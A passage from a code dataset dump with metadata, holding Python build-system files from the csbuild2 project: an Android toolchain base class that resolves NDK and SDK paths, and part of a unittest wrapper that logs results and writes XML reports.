[\"--ao\"]\n\n\tdef testWithSyntax(self):\n\t\t\"\"\"Test using the with syntax\"\"\"\n\t\tself.runTest(\"TestProject\")\n\n\tdef testChained(self):\n\t\t\"\"\"Test using chained context managers\"\"\"\n\t\tself.runTest(\"TestProjectChained\")\n" }, { "alpha_fraction": 0.6886898875236511, "alphanum_fraction": 0.6962937712669373, "avg_line_length": 34.507999420166016, "blob_id": "a37a367c349da787af833cfeedb64119c6e3a9dc", "content_id": "0861e14e2f8db500d59738044c20ff28476577df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17754, "license_type": "no_license", "max_line_length": 153, "num_lines": 500, "path": "/csbuild/tools/common/android_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_tool_base\n\t:synopsis: Abstract base class for Android tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport glob\nimport os\nimport platform\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\n@MetaClass(ABCMeta)\nclass AndroidStlLibType(object):\n\t\"\"\"\n\tEnum values for selecting the type of STL library linked into Android projects.\n\t\"\"\"\n\tGnu = \"gnu-libstdc++\"\n\tLibCpp = \"libc++\"\n\tStlPort = \"stlport\"\n\nclass AndroidInfo(object):\n\t\"\"\"\n\tCollection of paths for a specific version of Android and architecture.\n\n\t:param gccToolchainRootPath: Full path the root directory containing the gcc toolchain.\n\t:type gccToolchainRootPath: str\n\n\t:param gccPath: Full path to the gcc executable.\n\t:type gccPath: str\n\n\t:param gppPath: Full path to the g++ executable.\n\t:type gppPath: str\n\n\t:param asPath: Full path to the as executable.\n\t:type asPath: str\n\n\t:param ldPath: Full path to the ld executable.\n\t:type ldPath: str\n\n\t:param arPath: Full path to the ar executable.\n\t:type arPath: str\n\n\t:param clangPath: Full path to the clang executable.\n\t:type clangPath: str\n\n\t:param clangppPath: Full path to the clang++ executable.\n\t:type clangppPath: str\n\n\t:param zipAlignPath: Full path to the zipAlign executable.\n\t:type zipAlignPath: str\n\n\t:param sysRootPath: Full path to the Android system root.\n\t:type sysRootPath: str\n\n\t:param systemLibPath: Full path to the Android system libraries.\n\t:type systemLibPath: str\n\n\t:param systemIncludePaths: List of full paths to the Android system headers.\n\t:type systemIncludePaths: list[str]\n\n\t:param nativeAppGluPath: Full path to the Android native glue source and header files.\n\t:type nativeAppGluPath: str\n\n\t:param stlLibName: Basename of the STL library to link against.\n\t:type stlLibName: str\n\n\t:param stlLibPath: Full path to the STL libraries.\n\t:type stlLibPath: str\n\n\t:param stlIncludePaths: List of full paths to the STL headers.\n\t:type stlIncludePaths: list[str]\n\t\"\"\"\n\tInstances = {}\n\n\tdef __init__(\n\t\tself,\n\t\tgccToolchainRootPath,\n\t\tgccPath,\n\t\tgppPath,\n\t\tasPath,\n\t\tldPath,\n\t\tarPath,\n\t\tclangPath,\n\t\tclangppPath,\n\t\tzipAlignPath,\n\t\tsysRootPath,\n\t\tsystemLibPath,\n\t\tsystemIncludePaths,\n\t\tnativeAppGluPath,\n\t\tstlLibName,\n\t\tstlLibPath,\n\t\tstlIncludePaths,\n\t):\n\t\tself.gccToolchainRootPath = gccToolchainRootPath\n\t\tself.gccPath = gccPath\n\t\tself.gppPath = gppPath\n\t\tself.asPath = asPath\n\t\tself.ldPath = ldPath\n\t\tself.arPath = arPath\n\t\tself.clangPath = clangPath\n\t\tself.clangppPath = clangppPath\n\t\tself.zipAlignPath = zipAlignPath\n\t\tself.sysRootPath = sysRootPath\n\t\tself.systemLibPath = systemLibPath\n\t\tself.systemIncludePaths = [path for path in systemIncludePaths if path]\n\t\tself.nativeAppGluPath = nativeAppGluPath\n\t\tself.stlLibName = stlLibName\n\t\tself.stlLibPath = stlLibPath\n\t\tself.stlIncludePaths = [path for path in stlIncludePaths if path]\n\n\n@MetaClass(ABCMeta)\nclass AndroidToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targetting Android platforms.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm\", \"arm64\", \"mips\", \"mips64\" }\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._androidNdkRootPath = projectSettings.get(\"androidNdkRootPath\", \"\")\n\t\tself._androidSdkRootPath = projectSettings.get(\"androidSdkRootPath\", \"\")\n\t\tself._androidManifestFilePath = projectSettings.get(\"androidManifestFilePath\", \"\")\n\t\tself._androidTargetSdkVersion = projectSettings.get(\"androidTargetSdkVersion\", None)\n\t\tself._androidStlLibType = projectSettings.get(\"androidStlLibType\", None)\n\t\tself._androidNativeAppGlue = projectSettings.get(\"androidNativeAppGlue\", False)\n\n\t\t# If no NDK root path is specified, try to get it from the environment.\n\t\tif not self._androidNdkRootPath and \"ANDROID_NDK_ROOT\" in os.environ:\n\t\t\tself._androidNdkRootPath = os.environ[\"ANDROID_NDK_ROOT\"]\n\n\t\t# If no SDK root path is specified, try to get it from the environment.\n\t\tif not self._androidSdkRootPath and \"ANDROID_HOME\" in os.environ:\n\t\t\tself._androidSdkRootPath = os.environ[\"ANDROID_HOME\"]\n\n\t\tassert self._androidNdkRootPath, \"No Android NDK root path provided\"\n\t\tassert self._androidSdkRootPath, \"No Android SDK root path provided\"\n\t\tassert self._androidTargetSdkVersion, \"No Android target SDK version provided\"\n\n\t\tassert os.access(self._androidNdkRootPath, os.F_OK), \"Android NDK root path does not exist: {}\".format(self._androidNdkRootPath)\n\t\tassert os.access(self._androidSdkRootPath, os.F_OK), \"Android SDK root path does not exist: {}\".format(self._androidSdkRootPath)\n\n\t\tself._androidInfo = None\n\n\t####################################################################################################################\n\t### Private methods\n\t####################################################################################################################\n\n\tdef _getInfo(self, arch):\n\t\tkey = (self._androidNdkRootPath, self._androidSdkRootPath, arch)\n\n\t\tif key not in AndroidInfo.Instances:\n\t\t\tdef _getToolchainPrefix():\n\t\t\t\t# Search for a toolchain by architecture.\n\t\t\t\ttoolchainArchPrefix = {\n\t\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t\t\t\"arm\": \"arm\",\n\t\t\t\t\t\"arm64\": \"aarch64\",\n\t\t\t\t\t\"mips\": \"mipsel\",\n\t\t\t\t\t\"mips64\": \"mips64el\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert toolchainArchPrefix, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn toolchainArchPrefix\n\n\t\t\tdef _getStlArchName():\n\t\t\t\tstlArchName = {\n\t\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t\t\t\"arm\": \"armeabi-v7a\",\n\t\t\t\t\t\"arm64\": \"arm64-v8a\",\n\t\t\t\t\t\"mips\": \"mips\",\n\t\t\t\t\t\"mips64\": \"mips64\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert stlArchName, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn stlArchName\n\n\t\t\tdef _getIncludeArchName():\n\t\t\t\t# Search for a toolchain by architecture.\n\t\t\t\tincludeArchName = {\n\t\t\t\t\t\"x86\": \"i686-linux-android\",\n\t\t\t\t\t\"x64\": \"x86_64-linux-android\",\n\t\t\t\t\t\"arm\": \"arm-linux-androideabi\",\n\t\t\t\t\t\"arm64\": \"aarch64-linux-android\",\n\t\t\t\t\t\"mips\": \"mipsel-linux-android\",\n\t\t\t\t\t\"mips64\": \"mips64el-linux-android\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert includeArchName, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn includeArchName\n\n\t\t\t# Certain architectures must use the \"lib64\" directory instead of \"lib\".\n\t\t\tuseLib64 = {\n\t\t\t\t\"x64\": True,\n\t\t\t\t\"mips64\": True,\n\t\t\t}.get(arch, False)\n\n\t\t\tplatformName = platform.system().lower()\n\t\t\texeExtension = \".exe\" if platform.system() == \"Windows\" else \"\"\n\t\t\ttoolchainPrefix = _getToolchainPrefix()\n\t\t\trootToolchainPath = os.path.join(self._androidNdkRootPath, \"toolchains\")\n\t\t\tarchToolchainRootPath = glob.glob(os.path.join(rootToolchainPath, \"{}-*\".format(toolchainPrefix)))\n\t\t\tllvmToolchainRootPath = glob.glob(os.path.join(rootToolchainPath, \"llvm\", \"prebuilt\", \"{}-*\".format(platformName)))\n\t\t\tstlArchName = _getStlArchName()\n\t\t\tstlRootPath = os.path.join(self._androidNdkRootPath, \"sources\", \"cxx-stl\")\n\t\t\tsysRootPath = os.path.join(self._androidNdkRootPath, \"platforms\", \"android-{}\".format(self._androidTargetSdkVersion), self._getPlatformArchName(arch))\n\t\t\tsysRootLibPath = os.path.join(sysRootPath, \"usr\", \"lib64\" if useLib64 else \"lib\")\n\t\t\tsysRootBaseIncludePath = os.path.join(self._androidNdkRootPath, \"sysroot\", \"usr\", \"include\")\n\t\t\tsysRootArchIncludePath = os.path.join(sysRootBaseIncludePath, _getIncludeArchName())\n\t\t\tandroidSourcesRootPath = os.path.join(self._androidNdkRootPath, \"sources\", \"android\")\n\t\t\tandroidSupportIncludePath = os.path.join(androidSourcesRootPath, \"support\", \"include\")\n\t\t\tnativeAppGluePath = os.path.join(androidSourcesRootPath, \"native_app_glue\")\n\n\t\t\tassert archToolchainRootPath, \"No Android toolchain installed for architecture: {}\".format(arch)\n\t\t\tassert llvmToolchainRootPath, \"No Android LLVM toolchain installed for platform: {}\".format(platformName)\n\t\t\tassert os.access(sysRootPath, os.F_OK), \"No Android sysroot found at path: {}\".format(sysRootPath)\n\n\t\t\tarchToolchainRootPath = archToolchainRootPath[0]\n\n\t\t\tgccVersionStartIndex = archToolchainRootPath.rfind(\"-\")\n\t\t\tassert gccVersionStartIndex > 0, \"Android GCC version not parsable from path: {}\".format(archToolchainRootPath)\n\n\t\t\t# Save the gcc version since we'll need it for getting the libstdc++ paths.\n\t\t\tgccVersion = archToolchainRootPath[gccVersionStartIndex + 1:]\n\n\t\t\tarchToolchainRootPath = glob.glob(os.path.join(archToolchainRootPath, \"prebuilt\", \"{}-*\".format(platformName)))\n\t\t\tassert archToolchainRootPath, \"No Android \\\"{}\\\" toolchain installed for platform: {}\".format(toolchainPrefix, platformName)\n\n\t\t\tarchToolchainRootPath = archToolchainRootPath[0]\n\t\t\tllvmToolchainRootPath = llvmToolchainRootPath[0]\n\n\t\t\tarchToolchainIncludePath = glob.glob(os.path.join(archToolchainRootPath, \"lib\", \"gcc\", \"*\", \"*\", \"include\"))\n\t\t\tarchToolchainIncludePath = archToolchainIncludePath[0] if archToolchainIncludePath else \"\"\n\n\t\t\tarchToolchainBinPath = os.path.join(archToolchainRootPath, \"bin\")\n\t\t\tllvmToolchainBinPath = os.path.join(llvmToolchainRootPath, \"bin\")\n\n\t\t\t# Get the compiler and linker paths.\n\t\t\tgccPath = glob.glob(os.path.join(archToolchainBinPath, \"*-gcc{}\".format(exeExtension)))\n\t\t\tgppPath = glob.glob(os.path.join(archToolchainBinPath, \"*-g++{}\".format(exeExtension)))\n\t\t\tasPath = glob.glob(os.path.join(archToolchainBinPath, \"*-as{}\".format(exeExtension)))\n\t\t\tldPath = glob.glob(os.path.join(archToolchainBinPath, \"*-ld{}\".format(exeExtension)))\n\t\t\tarPath = glob.glob(os.path.join(archToolchainBinPath, \"*-ar{}\".format(exeExtension)))\n\t\t\tclangPath = os.path.join(llvmToolchainBinPath, \"clang{}\".format(exeExtension))\n\t\t\tclangppPath = os.path.join(llvmToolchainBinPath, \"clang++{}\".format(exeExtension))\n\n\t\t\t# Do not assert on missing gcc or clang. GCC was deprecated and removed from later versions of the NDK\n\t\t\t# and clang wasn't added until several NDK version in. It will be best if we assert when trying to use\n\t\t\t# their respective toolchains.\n\t\t\tassert asPath, \"No Android as executable found for architecture: {}\".format(arch)\n\t\t\tassert ldPath, \"No Android ld executable found for architecture: {}\".format(arch)\n\t\t\tassert arPath, \"No Android ar executable found for architecture: {}\".format(arch)\n\n\t\t\tgccPath = gccPath[0] if gccPath else None\n\t\t\tgppPath = gppPath[0] if gppPath else None\n\t\t\tasPath = asPath[0]\n\t\t\tldPath = ldPath[0]\n\t\t\tarPath = arPath[0]\n\n\t\t\tbuildToolsPath = glob.glob(os.path.join(self._androidSdkRootPath, \"build-tools\", \"*\"))\n\t\t\tassert buildToolsPath, \"No Android build tools are installed\"\n\n\t\t\t# For now, it doesn't seem like we need a specific version, so just pick the first one.\n\t\t\tbuildToolsPath = buildToolsPath[0]\n\n\t\t\t# Get the miscellaneous build tool paths.\n\t\t\tzipAlignPath = os.path.join(buildToolsPath, \"zipalign{}\".format(exeExtension))\n\n\t\t\tassert os.access(zipAlignPath, os.F_OK), \"ZipAlign not found in Android build tools path: {}\".format(buildToolsPath)\n\n\t\t\t# If an STL flavor has been specified, attempt to get its include & lib paths.\n\t\t\tif self._androidStlLibType:\n\t\t\t\tstlLibName = {\n\t\t\t\t\tAndroidStlLibType.Gnu: \"libgnustl\",\n\t\t\t\t\tAndroidStlLibType.LibCpp: \"libc++\",\n\t\t\t\t\tAndroidStlLibType.StlPort: \"libstlport\",\n\t\t\t\t}.get(self._androidStlLibType, None)\n\t\t\t\tassert stlLibName, \"Invalid Android STL type: {}\".format(self._androidStlLibType)\n\n\t\t\t\tstlLibDirName = {\n\t\t\t\t\tAndroidStlLibType.Gnu: \"gnu-libstdc++\",\n\t\t\t\t\tAndroidStlLibType.LibCpp: \"llvm-libc++\",\n\t\t\t\t\tAndroidStlLibType.StlPort: \"stlport\",\n\t\t\t\t}.get(self._androidStlLibType, None)\n\t\t\t\tassert stlLibName, \"Invalid Android STL type: {}\".format(self._androidStlLibType)\n\n\t\t\t\tstlRootPath = os.path.join(stlRootPath, stlLibDirName)\n\n\t\t\t\t# libstdc++ exists in a sub-directory indicating its version.\n\t\t\t\tif self._androidStlLibType == AndroidStlLibType.Gnu:\n\t\t\t\t\tstlRootPath = os.path.join(stlRootPath, gccVersion)\n\n\t\t\t\tassert os.access(stlRootPath, os.F_OK), \"Android STL \\\"{}\\\" not found at path: {}\".format(self._androidStlLibType, stlRootPath)\n\n\t\t\t\tstlLibPath = os.path.join(stlRootPath, \"libs\", stlArchName)\n\t\t\t\tstlIncludePaths = [\n\t\t\t\t\tos.path.join(stlRootPath, \"include\"),\n\t\t\t\t]\n\n\t\t\t\t# For some reason \"gnu-libstdc++\" thought it was a good idea to put includes under its library directory.\n\t\t\t\tif self._androidStlLibType == AndroidStlLibType.Gnu:\n\t\t\t\t\tstlIncludePaths.append(\n\t\t\t\t\t\tos.path.join(stlLibPath, \"include\"),\n\t\t\t\t\t)\n\n\t\t\telse:\n\t\t\t\t# No STL, just use dummy values.\n\t\t\t\tstlLibName = None\n\t\t\t\tstlLibPath = None\n\t\t\t\tstlIncludePaths = []\n\n\t\t\tAndroidInfo.Instances[key] = \\\n\t\t\t\tAndroidInfo(\n\t\t\t\t\tarchToolchainRootPath,\n\t\t\t\t\tgccPath,\n\t\t\t\t\tgppPath,\n\t\t\t\t\tasPath,\n\t\t\t\t\tldPath,\n\t\t\t\t\tarPath,\n\t\t\t\t\tclangPath,\n\t\t\t\t\tclangppPath,\n\t\t\t\t\tzipAlignPath,\n\t\t\t\t\tsysRootPath,\n\t\t\t\t\tsysRootLibPath,\n\t\t\t\t\t[\n\t\t\t\t\t\tsysRootBaseIncludePath,\n\t\t\t\t\t\tsysRootArchIncludePath,\n\t\t\t\t\t\tarchToolchainIncludePath,\n\t\t\t\t\t\tandroidSupportIncludePath,\n\t\t\t\t\t],\n\t\t\t\t\tnativeAppGluePath,\n\t\t\t\t\tstlLibName,\n\t\t\t\t\tstlLibPath,\n\t\t\t\t\tstlIncludePaths,\n\t\t\t\t)\n\n\t\treturn AndroidInfo.Instances[key]\n\n\tdef _getPlatformArchName(self, arch):\n\t\tplatformArchName = {\n\t\t\t\"x86\": \"arch-x86\",\n\t\t\t\"x64\": \"arch-x86_64\",\n\t\t\t\"arm\": \"arch-arm\",\n\t\t\t\"arm64\": \"arch-arm64\",\n\t\t\t\"mips\": \"arch-mips\",\n\t\t\t\"mips64\": \"arch-mips64\",\n\t\t}.get(arch, \"\")\n\t\tassert platformArchName, \"Architecture platform name not found for: {}\".format(arch)\n\t\treturn platformArchName\n\n\tdef _getBuildArchName(self, arch):\n\t\t# Only ARM needs a build architecture name.\n\t\tname = {\n\t\t\t\"arm\": \"armv7-a\",\n\t\t\t\"arm64\": \"armv8-a\",\n\t\t}.get(arch, \"\")\n\t\treturn name\n\n\tdef _getTargetTripleName(self, arch):\n\t\ttargetTriple = {\n\t\t\t\"x86\": \"i686-none-linux-android\",\n\t\t\t\"x64\": \"x86_64-none-linux-android\",\n\t\t\t\"arm\": \"armv7-none-linux-androideabi\",\n\t\t\t\"arm64\": \"aarch64-none-linux-android\",\n\t\t\t\"mips\": \"mipsel-none-linux-android\",\n\t\t\t\"mips64\": \"mips64el-none-linux-android\",\n\t\t}.get(arch, \"\")\n\t\tassert targetTriple, \"Architecture target triple not defined for: {}\".format(arch)\n\t\treturn targetTriple\n\n\tdef _getDefaultLinkerArgs(self):\n\t\treturn [\n\t\t\t\"-Wl,--no-undefined\",\n\t\t\t\"-Wl,--no-allow-shlib-undefined\",\n\t\t\t\"-Wl,--unresolved-symbols=report-all\",\n\t\t\t\"-Wl,-z,noexecstack\",\n\t\t\t\"-Wl,-z,relro\",\n\t\t\t\"-Wl,-z,now\",\n\t\t]\n\n\tdef _getDefaultCompilerArgs(self):\n\t\treturn [\n\t\t\t\"-funwind-tables\",\n\t\t\t\"-fstack-protector\",\n\t\t\t\"-fno-omit-frame-pointer\",\n\t\t\t\"-fno-strict-aliasing\",\n\t\t\t\"-fno-short-enums\",\n\t\t\t\"-Wa,--noexecstack\",\n\t\t]\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tTool.SetupForProject(self, project)\n\n\t\tif not self._androidInfo:\n\t\t\tself._androidInfo = self._getInfo(project.architectureName)\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetAndroidNdkRootPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android NDK home.\n\n\t\t:param path: Android NDK home path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidNdkRootPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetAndroidSdkRootPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android SDK root.\n\n\t\t:param path: Android SDK root path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidSdkRootPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetAndroidManifestFilePath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android manifest file.\n\n\t\t:param path: Android manifest file path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidManifestFilePath\", os.path.abspath(path))\n\n\t@staticmethod\n\tdef SetAndroidTargetSdkVersion(version):\n\t\t\"\"\"\n\t\tSets the Android target SDK version.\n\n\t\t:param version: Android target SDK version.\n\t\t:type version: int\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidTargetSdkVersion\", version)\n\n\t@staticmethod\n\tdef SetAndroidStlLibType(lib):\n\t\t\"\"\"\n\t\tSets the Android STL lib type.\n\n\t\t:param lib: Android STL lib type.\n\t\t:type lib: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidStlLibType\", lib)\n\n\t@staticmethod\n\tdef SetAndroidNativeAppGlue(useDefaultAppGlue):\n\t\t\"\"\"\n\t\tSets a boolean to use the default Android native app glue.\n\n\t\t:param useDefaultAppGlue: Use default Android native app glue?\n\t\t:type useDefaultAppGlue: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidNativeAppGlue\", useDefaultAppGlue)\n" }, { "alpha_fraction": 0.6762012243270874, "alphanum_fraction": 0.6797060370445251, "avg_line_length": 29.60553550720215, "blob_id": "45b6468ce3a2381a522f09a867fa6e4e3af3cadd", "content_id": "76ab3aaf3a127e41488f26903a2e6a5b3270d8c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8845, "license_type": "permissive", "max_line_length": 145, "num_lines": 289, "path": "/csbuild/_testing/testcase.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: testcase\n\t:synopsis: Thin wrapper around python unittest that adds some extra information (mostly logging in setUp)\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\nimport sys\nimport time\nimport os\n\nfrom xml.etree import ElementTree\nfrom xml.dom import minidom\n\n\ninitialized = False\n\n\ndef _init():\n\t\"\"\"Initialize some test environment data\"\"\"\n\tglobal initialized\n\tif not initialized:\n\t\tfrom .._utils import shared_globals, terminfo\n\n\t\tinitialized = True\n\t\tshared_globals.startTime = time.time()\n\n\t\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\t\tshared_globals.showCommands = True\n\n\nclass _TestContainer(object):\n\tdef __init__(self, className):\n\t\tself.className = className\n\t\tself.successCount = 0\n\t\tself.failureCount = 0\n\n\nclass TestCase(unittest.TestCase):\n\t\"\"\"\n\tThin wrapper around python unittest to provide more details on test progress\n\t\"\"\"\n\t_runTestCases = set()\n\t_currentTestCase = None # type: _TestContainer\n\t_totalSuccess = 0\n\t_totalFail = 0\n\t_failedTestNames = []\n\n\tdef __init__(self, methodName):\n\t\tsuper(TestCase, self).__init__(methodName)\n\t\tself.success = True\n\t\t_init()\n\n\tdef run(self, result=None):\n\t\t\"\"\"\n\t\tRuns the test suite.\n\n\t\t:param result: optional test result\n\t\t:type result: unittest.TestResult\n\t\t\"\"\"\n\t\tfrom .. import log\n\t\tif self.__class__.__name__ not in TestCase._runTestCases:\n\t\t\tTestCase.PrintSingleResult()\n\t\t\tTestCase._runTestCases.add(self.__class__.__name__)\n\t\t\tTestCase._currentTestCase = _TestContainer(self.__class__.__name__)\n\t\t\tlog.Test(\"RUNNING TEST SUITE: <&CYAN>{}</&>\", self.__class__.__name__)\n\n\t\tlog.Test(\" Running test:\t {}.<&CYAN>{}</&> ...\", self.__class__.__name__, self._testMethodName)\n\t\tunittest.TestCase.run(self, result)\n\t\tif self.success:\n\t\t\tlog.Test(\"\t ... <&DGREEN>[</&><&GREEN>Success!</&><&DGREEN>]\")\n\t\t\tTestCase._currentTestCase.successCount += 1\n\t\t\tTestCase._totalSuccess += 1\n\t\telse:\n\t\t\tlog.Test(\"\t ... <&DRED>[</&><&RED>Failed!</&><&DRED>]\")\n\t\t\tTestCase._currentTestCase.failureCount += 1\n\t\t\tTestCase._totalFail += 1\n\t\t\tTestCase._failedTestNames.append(\"{}.<&CYAN>{}</&>\".format(self.__class__.__name__, self._testMethodName))\n\n\tdef TestName(self):\n\t\t\"\"\"Get the test method name for this test\"\"\"\n\t\treturn self._testMethodName\n\n\tdef TestDoc(self):\n\t\t\"\"\"Get the docstring attached to this test\"\"\"\n\t\treturn self._testMethodDoc\n\n\t@staticmethod\n\tdef PrintSingleResult():\n\t\t\"\"\"\n\t\tPrint the result of the last test suite, if any have been run\n\t\t\"\"\"\n\t\tfrom .. import log\n\t\tif TestCase._currentTestCase is not None:\n\t\t\ttxt = \"{} <&GREEN>{}</&> test{} succeeded\".format(\n\t\t\t\tTestCase._currentTestCase.className,\n\t\t\t\tTestCase._currentTestCase.successCount,\n\t\t\t\t\"s\" if TestCase._currentTestCase.successCount != 1 else \"\"\n\t\t\t)\n\t\t\tif TestCase._currentTestCase.failureCount > 0:\n\t\t\t\ttxt += \", <&RED>{}</&> failed\".format(TestCase._currentTestCase.failureCount)\n\t\t\telse:\n\t\t\t\ttxt += \"!\"\n\t\t\ttxt += \"\\n----------------------------------------------------------------------\"\n\t\t\tlog.Test(txt)\n\n\t@staticmethod\n\tdef PrintOverallResult():\n\t\t\"\"\"\n\t\tPrint the overall result of the entire unit test run\n\t\t\"\"\"\n\t\tfrom .. import log\n\t\ttxt = \"Unit test results: <&GREEN>{}</&> test{} succeeded\".format(\n\t\t\tTestCase._totalSuccess,\n\t\t\t\"s\" if TestCase._totalSuccess != 1 else \"\"\n\t\t)\n\t\tif TestCase._totalFail > 0:\n\t\t\ttxt += \", <&RED>{}</&> failed\".format(TestCase._totalFail)\n\t\telse:\n\t\t\ttxt += \"!\"\n\t\tif TestCase._totalFail > 0:\n\t\t\ttxt += \"\\nFailed tests:\"\n\t\t\tfor failedTest in TestCase._failedTestNames:\n\t\t\t\ttxt += \"\\n\\t\" + failedTest\n\t\tlog.Test(txt)\n\n\nclass TestResult(unittest.TextTestResult):\n\t\"\"\"\n\tThin wrapper of unittest.TextTestResult to print out a little more info at the start and end of a test run\n\n\t:param xmlfile: File to store the result xml data in\n\t:type xmlfile:\n\tFor the other parameters, see unittest.TextTestResult\n\t\"\"\"\n\tdef __init__(self, stream, descriptions, verbosity, xmlfile=None):\n\t\tsuper(TestResult, self).__init__(stream, descriptions, verbosity)\n\t\tself.testList = {}\n\t\tself.timer = 0\n\t\tself.xmlfile = xmlfile\n\n\tdef startTestRun(self):\n\t\t\"\"\"\n\t\tStart running the test suite\n\t\t\"\"\"\n\t\tsys.stdout.write(\"----------------------------------------------------------------------\\n\")\n\n\tdef stopTestRun(self):\n\t\t\"\"\"\n\t\tStop running the test suite\n\t\t\"\"\"\n\t\tTestCase.PrintSingleResult()\n\t\tTestCase.PrintOverallResult()\n\t\tfailureDict = dict(self.failures)\n\t\terrorDict = dict(self.errors)\n\t\tskipDict = dict(self.skipped)\n\t\troot = ElementTree.Element(\"testsuites\")\n\t\tadd = ElementTree.SubElement\n\n\t\tsuites = {}\n\n\t\tfor test, testTime in self.testList.items():\n\t\t\tif test.__class__.__name__ not in suites:\n\t\t\t\tsuites[test.__class__.__name__] = {}\n\t\t\tsuites[test.__class__.__name__][test] = testTime\n\n\t\tfor suiteName, tests in suites.items():\n\t\t\tsuiteTime = 0\n\t\t\tfor _, testTime in tests.items():\n\t\t\t\tsuiteTime += testTime\n\n\t\t\tsuite = add(\n\t\t\t\troot,\n\t\t\t\t\"testsuite\",\n\t\t\t\tname = suiteName,\n\t\t\t\ttests=str(len(self.testList)),\n\t\t\t\terrors=str(len(errorDict)),\n\t\t\t\tfailures=str(len(failureDict)),\n\t\t\t\tskipped=str(len(skipDict)),\n\t\t\t\ttime=\"{:.3f}\".format(suiteTime)\n\t\t\t)\n\n\t\t\tfor test, testTime in tests.items():\n\t\t\t\tcase = add(suite, \"testcase\", classname=\"{}.{}\".format(suiteName, test.TestName()), name=str(test.TestDoc()), time=\"{:.3f}\".format(testTime))\n\t\t\t\tif test in failureDict:\n\t\t\t\t\tadd(case, \"failure\").text = failureDict[test]\n\t\t\t\tif test in errorDict:\n\t\t\t\t\tadd(case, \"error\").text = 